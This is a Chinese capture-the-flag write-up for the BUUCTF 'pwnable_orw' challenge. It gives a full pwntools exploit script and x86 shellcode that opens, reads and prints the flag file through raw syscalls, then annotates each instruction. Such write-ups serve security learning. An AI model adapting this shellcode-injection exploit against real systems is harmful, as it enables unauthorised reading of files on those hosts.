BUU | pwnable_orw

题解网上其他师傅已经写过了而且写的很详细,菜鸡只好写一下自己做题中的笔记


 

Payload :

#coding:utf-8
from pwn  import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
p=remote('node3.buuoj.cn',28288)
shellcode=""
shellcode += asm('xor ecx,ecx;mov eax,0x5; push ecx;push 0x67616c66; mov ebx,esp;xor edx,edx;int 0x80;')
shellcode += asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov dl,0x30;int 0x80;')
shellcode += asm('mov eax,0x4;mov bl,0x1;int 0x80;')
recv = p.recvuntil(':')
p.sendline(shellcode)
flag = p.recv(100)
print flag

 Shellcode解析:

在文件读写之前,我们必须先打开文件。从应用程序的角度来看,这是通过标准库的open函数完成的,该函数返回一个文件描述符。内核中是由系统调用sys_open()函数完成。
https://www.linuxidc.com/Linux/2012-02/54224.htm
https://www.shiyanlou.com/courses/reports/1098951/
https://blog.csdn.net/qq_35495684/article/details/80161177



第一部分:实现
--》char*file='flag';
--》sys_open(file,0,0);

    xor ecx,ecx;
    mov eax,0x5;     # eax = sys_open
    push ecx;        # 字符串结尾"\00"
    push 0x67616c66; # "flags" 
    mov ebx,esp;     # ebx = const char __user *filename
    xor edx,edx;     # edx  = int mode 设定权限的
    int 0x80;
    
第二部分:实现
--》sys_read(3,file,0x30);

    mov eax,0x3; # eax = sys_read
    mov ecx,ebx; # ecx = char __user *buf 缓冲区,读出的数据-->也就是读“flag”
    mov ebx,0x3; # ebx = unsigned int fd = 3 文件描述符
    mov dl,0x30; # edx = size_t count 对应字节数
    int 0x80;

'''
fd:是文件描述符 0 1 2 3 代表标准的输出输入和出错,其他打开的文件
buf:通常是一个字符串,需要写入的字符串
count:是每次写入的字节数
'''
第三部分:实现
--》sys_write(1,file,0x30);

    mov eax,0x4; # eax = sys_write
    mov bl,0x1;  # ebx = unsigned int fd = 1
    int 0x80;

 

posted @ 2020-02-17 19:30  东坡肉肉君  阅读(843)  评论(1编辑  收藏  举报